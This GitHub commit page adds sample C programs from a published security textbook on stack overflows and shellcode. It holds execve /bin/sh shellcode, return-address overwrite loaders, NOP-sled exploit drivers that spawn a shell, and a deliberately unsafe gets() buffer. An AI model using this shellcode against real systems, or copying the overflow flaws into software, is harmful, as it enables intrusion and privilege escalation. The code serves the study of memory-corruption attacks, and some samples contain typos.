Skip to content

Commit 9da300b

Browse files
author
Elia Pinto
committed
1 parent 5cda410 commit 9da300b

File tree

99 files changed

+8294
-0
lines changed

Some content is hidden

Large Commits have some content hidden by default. Use the searchbox below for content that may be hidden.

99 files changed

+8294
-0
lines changed

Chapter_02/Shellcoders02sampleprogram01.c

Lines changed: 21 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,21 @@
1+
/*
2+
3+
The Shellcoder's Handbook: Discovering and Exploiting Security Holes
4+
Jack Koziol, David Litchfield, Dave Aitel, Chris Anley,
5+
Sinan Eren, Neel Mehta, Riley Hassell
6+
Publisher: John Wiley & Sons
7+
ISBN: 0764544683
8+
9+
Chapter 2: Stack Overflows
10+
Sample Program #1
11+
12+
Please send comments/feedback to [email protected] or visit http://www.infosecinstitute.com
13+
14+
*/
15+
16+
int main () {
17+
18+
int array[5] = {1, 2, 3, 4, 5};
19+
20+
printf(“%d\n”, array[5];
21+
}

Chapter_02/Shellcoders02sampleprogram02.c

Lines changed: 25 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,25 @@
1+
/*
2+
3+
The Shellcoder's Handbook: Discovering and Exploiting Security Holes
4+
Jack Koziol, David Litchfield, Dave Aitel, Chris Anley,
5+
Sinan Eren, Neel Mehta, Riley Hassell
6+
Publisher: John Wiley & Sons
7+
ISBN: 0764544683
8+
9+
Chapter 2: Stack Overflows
10+
Sample Program #2
11+
12+
Please send comments/feedback to [email protected] or visit http://www.infosecinstitute.com
13+
14+
*/
15+
16+
int main () {
17+
18+
int array[5];
19+
int i;
20+
21+
for (i = 0; i <= 255; ++i){
22+
array[i] = 10;
23+
}
24+
}
25+

Chapter_02/Shellcoders02sampleprogram03.c

Lines changed: 27 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,27 @@
1+
/*
2+
3+
The Shellcoder's Handbook: Discovering and Exploiting Security Holes
4+
Jack Koziol, David Litchfield, Dave Aitel, Chris Anley,
5+
Sinan Eren, Neel Mehta, Riley Hassell
6+
Publisher: John Wiley & Sons
7+
ISBN: 0764544683
8+
9+
Chapter 2: Stack Overflows
10+
Sample Program #3
11+
12+
Please send comments/feedback to [email protected] or visit http://www.infosecinstitute.com
13+
14+
*/
15+
16+
void function(int a, int b){
17+
int array[5];
18+
}
19+
20+
main()
21+
{
22+
function(1,2);
23+
24+
printf("This is where the return address points”);
25+
}
26+
27+

Chapter_02/Shellcoders02sampleprogram04.c

Lines changed: 33 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,33 @@
1+
/*
2+
3+
The Shellcoder's Handbook: Discovering and Exploiting Security Holes
4+
Jack Koziol, David Litchfield, Dave Aitel, Chris Anley,
5+
Sinan Eren, Neel Mehta, Riley Hassell
6+
Publisher: John Wiley & Sons
7+
ISBN: 0764544683
8+
9+
Chapter 2: Stack Overflows
10+
Sample Program #4
11+
12+
Please send comments/feedback to [email protected] or visit http://www.infosecinstitute.com
13+
14+
*/
15+
16+
void return_input (void){
17+
char array[30];
18+
19+
gets (array);
20+
printf("%s\n", array);
21+
22+
}
23+
24+
25+
main() {
26+
return_input();
27+
28+
return 0;
29+
30+
}
31+
32+
33+

Chapter_02/Shellcoders02sampleprogram05.c

Lines changed: 32 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,32 @@
1+
/*
2+
3+
The Shellcoder's Handbook: Discovering and Exploiting Security Holes
4+
Jack Koziol, David Litchfield, Dave Aitel, Chris Anley,
5+
Sinan Eren, Neel Mehta, Riley Hassell
6+
Publisher: John Wiley & Sons
7+
ISBN: 0764544683
8+
9+
Chapter 2: Stack Overflows
10+
Sample Program #5
11+
12+
Please send comments/feedback to [email protected] or visit http://www.infosecinstitute.com
13+
14+
*/
15+
16+
char shellcode[] =
17+
"\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46"
18+
"\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1"
19+
"\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";
20+
21+
22+
int main()
23+
{
24+
25+
int *ret;
26+
ret = (int *)&ret + 2;
27+
(*ret) = (int)shellcode;
28+
}
29+
30+
31+
32+

Chapter_02/Shellcoders02sampleprogram06.c

Lines changed: 64 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,64 @@
1+
/*
2+
3+
The Shellcoder's Handbook: Discovering and Exploiting Security Holes
4+
Jack Koziol, David Litchfield, Dave Aitel, Chris Anley,
5+
Sinan Eren, Neel Mehta, Riley Hassell
6+
Publisher: John Wiley & Sons
7+
ISBN: 0764544683
8+
9+
Chapter 2: Stack Overflows
10+
Sample Program #6
11+
12+
Please send comments/feedback to [email protected] or visit http://www.infosecinstitute.com
13+
14+
*/
15+
16+
#include <stdlib.h>
17+
18+
#define offset_size 0
19+
#define buffer_size 512
20+
21+
char sc[] =
22+
"\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46"
23+
"\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1"
24+
"\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";
25+
26+
27+
unsigned long find_start(void) {
28+
__asm__("movl %esp,%eax");
29+
}
30+
31+
int main(int argc, char *argv[])
32+
{
33+
char *buff, *ptr;
34+
long *addr_ptr, addr;
35+
int offset=offset_size, bsize=buffer_size;
36+
int i;
37+
38+
if (argc > 1) bsize = atoi(argv[1]);
39+
if (argc > 2) offset = atoi(argv[2]);
40+
41+
addr = find_start() - offset;
42+
printf("Attempting address: 0x%x\n", addr);
43+
44+
ptr = buff;
45+
addr_ptr = (long *) ptr;
46+
for (i = 0; i < bsize; i+=4)
47+
*(addr_ptr++) = addr;
48+
49+
ptr += 4;
50+
51+
for (i = 0; i < strlen(sc); i++)
52+
*(ptr++) = sc[i];
53+
54+
buff[bsize - 1] = '\0';
55+
56+
memcpy(buff,"BUF=",4);
57+
putenv(buff);
58+
system("/bin/bash");
59+
}
60+
61+
62+
63+
64+

Chapter_02/Shellcoders02sampleprogram07.c

Lines changed: 70 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,70 @@
1+
/*
2+
3+
The Shellcoder's Handbook: Discovering and Exploiting Security Holes
4+
Jack Koziol, David Litchfield, Dave Aitel, Chris Anley,
5+
Sinan Eren, Neel Mehta, Riley Hassell
6+
Publisher: John Wiley & Sons
7+
ISBN: 0764544683
8+
9+
Chapter 2: Stack Overflows
10+
Sample Program #7
11+
12+
Please send comments/feedback to [email protected] or visit http://www.infosecinstitute.com
13+
14+
*/
15+
16+
#include <stdlib.h>
17+
18+
#define DEFAULT_OFFSET 0
19+
#define DEFAULT_BUFFER_SIZE 512
20+
#define NOP 0x90
21+
22+
char shellcode[] =
23+
24+
"\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46"
25+
"\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1"
26+
"\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";
27+
28+
29+
unsigned long get_sp(void) {
30+
__asm__("movl %esp,%eax");
31+
}
32+
33+
void main(int argc, char *argv[])
34+
{
35+
char *buff, *ptr;
36+
long *addr_ptr, addr;
37+
int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
38+
int i;
39+
40+
if (argc > 1) bsize = atoi(argv[1]);
41+
if (argc > 2) offset = atoi(argv[2]);
42+
43+
if (!(buff = malloc(bsize))) {
44+
printf("Can't allocate memory.\n");
45+
exit(0);
46+
}
47+
48+
addr = get_sp() - offset;
49+
printf("Using address: 0x%x\n", addr);
50+
51+
ptr = buff;
52+
addr_ptr = (long *) ptr;
53+
for (i = 0; i < bsize; i+=4)
54+
*(addr_ptr++) = addr;
55+
56+
for (i = 0; i < bsize/2; i++)
57+
buff[i] = NOP;
58+
59+
ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
60+
for (i = 0; i < strlen(shellcode); i++)
61+
*(ptr++) = shellcode[i];
62+
63+
buff[bsize - 1] = '\0';
64+
65+
memcpy(buff,"BUF=",4);
66+
putenv(buff);
67+
system("/bin/bash");
68+
}
69+
70+

Chapter_03/Shellcoders03sampleprogram01.c

Lines changed: 26 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,26 @@
1+
/*
2+
3+
The Shellcoder's Handbook: Discovering and Exploiting Security Holes
4+
Jack Koziol, David Litchfield, Dave Aitel, Chris Anley,
5+
Sinan Eren, Neel Mehta, Riley Hassell
6+
Publisher: John Wiley & Sons
7+
ISBN: 0764544683
8+
9+
Chapter 3: Shellcode
10+
Sample Program #1
11+
12+
Please send comments/feedback to [email protected] or visit http://www.infosecinstitute.com
13+
14+
*/
15+
16+
char shellcode[] = "\xbb\x00\x00\x00\x00"
17+
"\xb8\x01\x00\x00\x00"
18+
"\xcd\x80";
19+
20+
int main()
21+
{
22+
int *ret;
23+
ret = (int *)&ret + 2;
24+
(*ret) = (int)shellcode;
25+
}
26+

Chapter_03/Shellcoders03sampleprogram02.c

Lines changed: 28 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,28 @@
1+
/*
2+
3+
The Shellcoder's Handbook: Discovering and Exploiting Security Holes
4+
Jack Koziol, David Litchfield, Dave Aitel, Chris Anley,
5+
Sinan Eren, Neel Mehta, Riley Hassell
6+
Publisher: John Wiley & Sons
7+
ISBN: 0764544683
8+
9+
Chapter 3: Shellcode
10+
Sample Program #2
11+
12+
Please send comments/feedback to [email protected] or visit http://www.infosecinstitute.com
13+
14+
*/
15+
16+
char shellcode[] = "\xbb\x00\x00\x00\x00"
17+
"\xb8\xfc\x00\x00\x00"
18+
"\xcd\x80";
19+
20+
int main()
21+
{
22+
23+
int *ret;
24+
ret = (int *)&ret + 2;
25+
(*ret) = (int)shellcode;
26+
}
27+
28+

Chapter_03/Shellcoders03sampleprogram03.c

Lines changed: 31 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,31 @@
1+
/*
2+
3+
The Shellcoder's Handbook: Discovering and Exploiting Security Holes
4+
Jack Koziol, David Litchfield, Dave Aitel, Chris Anley,
5+
Sinan Eren, Neel Mehta, Riley Hassell
6+
Publisher: John Wiley & Sons
7+
ISBN: 0764544683
8+
9+
Chapter 3: Shellcode
10+
Sample Program #3
11+
12+
Please send comments/feedback to [email protected] or visit http://www.infosecinstitute.com
13+
14+
*/
15+
16+
char shellcode[] =
17+
"\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46"
18+
"\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1"
19+
"\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x4a\x41\x41\x41\x41"
20+
"\x4b\x4b\x4b\x4b";
21+
22+
int main()
23+
{
24+
25+
int *ret;
26+
ret = (int *)&ret + 2;
27+
(*ret) = (int)shellcode;
28+
}
29+
30+
31+

0 commit comments

Comments
 (0)